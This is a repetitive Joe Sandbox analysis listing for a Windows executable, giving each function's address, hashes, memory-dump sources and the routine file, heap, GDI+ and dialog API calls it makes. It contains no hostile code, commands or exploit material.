API String ID: 3519838083-0
Opcode ID: 1fb6a33b1925713eb645e5e20e46e2daf1dfb521970677e2f01b74d5a2ccba36
Instruction ID: 486a0d9ba94c1d7f3270ee962df2c5da39ceb43f966abd996000f9336078c892
Opcode Fuzzy Hash: 1fb6a33b1925713eb645e5e20e46e2daf1dfb521970677e2f01b74d5a2ccba36
Instruction Fuzzy Hash: 864116B0805B419EEB24DF798489AE6FEE5FF19300F504A2ED1EE83282DB326554CB15

Function 0059971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00599EDC,?,?,00597867), ref: 005997A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00599EDC,?,?,00597867), ref: 005997DB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 96a2446147f512e506999edf1245d11a7e619fe0701348479cb444a1427ffdfd
Instruction ID: d409915d476ec5580060b27fcdc83974c4b91dfdcbb5293a84314fa31b216f97
Opcode Fuzzy Hash: 96a2446147f512e506999edf1245d11a7e619fe0701348479cb444a1427ffdfd
Instruction Fuzzy Hash: 7221F8B1110749AFEB308F98C889FA77BE8FB4A764F00491DF5D582191C775AC489B61

Function 00599D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00597547,?,?,?,?), ref: 00599D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00599E2C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 3b241c5b7917cb8a62ed49a46216c977d47aee3247c8369fd4b958b55623d204
Instruction ID: ad5f003e9b324c0d7b4aae3f8617e60e4124a2348599710a9f1801b12a21c72a
Opcode Fuzzy Hash: 3b241c5b7917cb8a62ed49a46216c977d47aee3247c8369fd4b958b55623d204
Instruction Fuzzy Hash: AF21D63215834AAFDB14DE29C495EABBFE8BF96704F04481CB4C187541D329DA0CDBA1

Function 005BA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,005C3958), ref: 005BA4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 005BA4C5

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: b1f1ead986039a48cd3e49cc71b4fee57d722e5f2c4eeab6fb05854310d7c8ea
Instruction ID: d3f08cf72fd8e92b03922c84769598c502b0ee0542343dcb20fe0f7da44fda94
Opcode Fuzzy Hash: b1f1ead986039a48cd3e49cc71b4fee57d722e5f2c4eeab6fb05854310d7c8ea
Instruction Fuzzy Hash: DC113A33A105219F9F259E28FC49CEA7BA5BB813207164120FD15EB244EB74FC45D6D2

Function 00599B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00599B35,?,?,00000000,?,?,00598D9C,?), ref: 00599BC0
GetLastError.KERNEL32 ref: 00599BCD

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 482ac8a47c38c09a8ad29a25ade748524e83ef12ed74be851efa9cabe7afdf87
Instruction ID: 515e19e8ba38c3e613f37297459ad1904d0f20d50b9114b438d1fe56950570af
Opcode Fuzzy Hash: 482ac8a47c38c09a8ad29a25ade748524e83ef12ed74be851efa9cabe7afdf87
Instruction Fuzzy Hash: 23012B763092059F8F08CF6DAC9497EBB9BBFC0321B14852DF81687280CA38DC05A721

Function 00599E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00599E76
GetLastError.KERNEL32 ref: 00599E82

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: df6e49333ef4b957b5715146876ec663c8c571fe2b11cd9e3dabef892fb1560e
Instruction ID: 596d2e87bbf7df8792813d81420ff0d62995b70331bdcee1f9022fc9c017fe0c
Opcode Fuzzy Hash: df6e49333ef4b957b5715146876ec663c8c571fe2b11cd9e3dabef892fb1560e
Instruction Fuzzy Hash: BE019A727052056FEF34DE2DDC88B6BBADDAB88325F14893EB146C2680DA31EC4C8611

Function 005B8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005B8627

Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,005D0F50,0059CE57,?,?,?,?,?,?), ref: 005B8663

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 79ca8d56f74118a2f9dab5a20af872f905e310b9e53369a592b37ab8e3bb683c
Instruction ID: 813a167f2bf0f99464e3c9bcc6042d8cef13d7f2ae1b3f81f8a3f5326c7a6d2b
Opcode Fuzzy Hash: 79ca8d56f74118a2f9dab5a20af872f905e310b9e53369a592b37ab8e3bb683c
Instruction Fuzzy Hash: 61F06231101516AADB212E25AC05FFB2F5CBFF17A0F286515F82596191DE30F801D5A5

Function 005A0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 005A0915
GetProcessAffinityMask.KERNEL32(00000000), ref: 005A091C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 9cd0d04e4a2413760bc53765c0ca907023d079a14704773261baf2c4a65613ca
Instruction ID: 601676ed4d5144dc14fd261e380c86d435dcd986da4845e35e810a0c4bc9b930
Opcode Fuzzy Hash: 9cd0d04e4a2413760bc53765c0ca907023d079a14704773261baf2c4a65613ca
Instruction Fuzzy Hash: E3E09233A20109AFAF09DAA49C088BF7B9DFB1A3147209179A907D3241F931DE0586A1

Function 0059A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0059A27A,?,?,?,0059A113,?,00000001,00000000,?,?), ref: 0059A489

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 183f9285206aafec13372ecd495967e2c591a19720e42e27472187305121196b
Instruction ID: 22bd09fa9fb2858bfd7a02cde7cc6e175ec94e67d6ae05de6a9cca027cde3321
Opcode Fuzzy Hash: 183f9285206aafec13372ecd495967e2c591a19720e42e27472187305121196b
Instruction Fuzzy Hash: F2F0303124020DBBEF115F60DC49FDA7B6CBB05785F448051BC8C96161DB769AA8AAA0

Function 005AD573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 005AD5A1
SetDlgItemTextW.USER32(00000065,?), ref: 005AD5B8

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 5a380791d70f10ce06c7afd8bbca20765f1a5a1a2b03862c806810b80976aa43
Instruction ID: cb40943e3a8523a9d1894f7898d162b375092e56cd25d13cdbb057643417f20e
Opcode Fuzzy Hash: 5a380791d70f10ce06c7afd8bbca20765f1a5a1a2b03862c806810b80976aa43
Instruction Fuzzy Hash: 85F027719003486AEF11ABA08C0AFAE3F68B706745F000983B601930A1DA716A149A61

Function 0059A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,0059984C,?,?,00599688,?,?,?,?,005C1FA1,000000FF), ref: 0059A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0059984C,?,?,00599688,?,?,?,?,005C1FA1,000000FF), ref: 0059A16C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: aa81593978987e71b9b84fbdfb170c758dad308928e2f953156423a273bff6c7
Instruction ID: 540f27688943739754f0ded35a56732266fb08d246f18a9bd1ff59244efda980
Opcode Fuzzy Hash: aa81593978987e71b9b84fbdfb170c758dad308928e2f953156423a273bff6c7
Instruction Fuzzy Hash: A3E0923564020D6BEF119F60DC49FE97BACBB09381F484065B888D3060DB62AD98FAA0

Function 005AA39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,005C1FA1,000000FF), ref: 005AA3D1
CoUninitialize.COMBASE(?,?,?,?,005C1FA1,000000FF), ref: 005AA3D6

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: b30e75ba658377486b8a4dad0219e23fcb3f9563c7ad5dc73c2316dba5d27f78
Instruction ID: d4c8f6e1be6d108d8002716b8a19fba97f5f164fb9afb3d975a39b65ca49e49c
Opcode Fuzzy Hash: b30e75ba658377486b8a4dad0219e23fcb3f9563c7ad5dc73c2316dba5d27f78
Instruction Fuzzy Hash: C2F03976658A55EFCB109B4CDC06F59FBA8FB8AB20F04436AF419C3760CB786800CA95

Function 0059A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0059A189,?,005976B2,?,?,?,?), ref: 0059A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0059A189,?,005976B2,?,?,?,?), ref: 0059A1D1

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0539db6cb280b1069c04334dec28a49a86db1abcdb01d18c629e3e1e1af838f6
Instruction ID: a0dd97f63686397f8a9678540839ac1d465a4624dd6c882dff04324d2ec2687e
Opcode Fuzzy Hash: 0539db6cb280b1069c04334dec28a49a86db1abcdb01d18c629e3e1e1af838f6
Instruction Fuzzy Hash: B7E0923650052C9BDF20AB68DC09FD9BB6CBB193E1F0042A2FD44E3290D7719D48AAE0

Function 005A0085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 3659534d7d2690e5fe1e0b407ce6c05d41d25b32be170525e4019272dd02152d
Instruction ID: fd85316034eae04d4612ee5861bfadbd575ca540c70e08e7c1af643e75147223
Opcode Fuzzy Hash: 3659534d7d2690e5fe1e0b407ce6c05d41d25b32be170525e4019272dd02152d
Instruction Fuzzy Hash: 4AE0927691111C6ADB209AA4AC0DFDB7BACFF09382F0400A6B908E3004DA709A448BA0

Function 005A9B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 005A9B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 005A9B37

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 0a915fdae1f94c913df9598e7af23fa6ba24e42a806b8c10f31d970b52deeb78
Instruction ID: 07a1ae9bd81bb29608df70cde932a18bf6ef726ae0f2a837dc6e9c90048da333
Opcode Fuzzy Hash: 0a915fdae1f94c913df9598e7af23fa6ba24e42a806b8c10f31d970b52deeb78
Instruction Fuzzy Hash: 38E0ED75905219EFCB10DF98D505B9EBBF8FF05321F10805FE89593600D6716E449BA1

Function 005B215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 005B329A: try_get_function.LIBVCRUNTIME ref: 005B32AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 005B2185

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 7c08192e2514a25947a50f948bc3056230009017348f5c6ba42bd016a8d57c16
Instruction ID: 443993925a7d8285e121053b855ecfe29f34af24cf8a0867d6ccec02d63b27e7
Opcode Fuzzy Hash: 7c08192e2514a25947a50f948bc3056230009017348f5c6ba42bd016a8d57c16
Instruction Fuzzy Hash: 8FD0A77410470764291426B8284A4F92F4479A2B70BE00B45E320994E1EE107044E131

Function 005ADC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 005ADC73
DloadProtectSection.DELAYIMP ref: 005ADC8F

Part of subcall function 005ADE67: DloadObtainSection.DELAYIMP ref: 005ADE77

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: cacba9d0e7b69791a709b995d7f42cbc09e07754f8fe5e2db150dc9b937d683c
Instruction ID: 6f8a6b59e8c9533de7b8a4c9982d2a1b699029cb0cb9f2c8aa80922bbbd7903d
Opcode Fuzzy Hash: cacba9d0e7b69791a709b995d7f42cbc09e07754f8fe5e2db150dc9b937d683c
Instruction Fuzzy Hash: 52D0C9701802024EC211FB549D4A72C7AB4B766754FA81A01F107C69E2EFAD4C88E665

Function 005912E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 005912FB
ShowWindow.USER32(00000000), ref: 00591302

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 78cd7885bd1f125deeb8d545aa3e9616c050c7356a44fa5316b45c08f96173ac
Instruction ID: 753c5336a639732f877f4a31f94f2d4148700bb95f510679f6ded34c6b0bc7b4
Opcode Fuzzy Hash: 78cd7885bd1f125deeb8d545aa3e9616c050c7356a44fa5316b45c08f96173ac
Instruction Fuzzy Hash: 81C012B2058200BECB010BB0DC09D3FBFA8ABA4212F05C908B2A5C0060C23CC018EB11

Function 005919A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005919AB

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: H_prolog
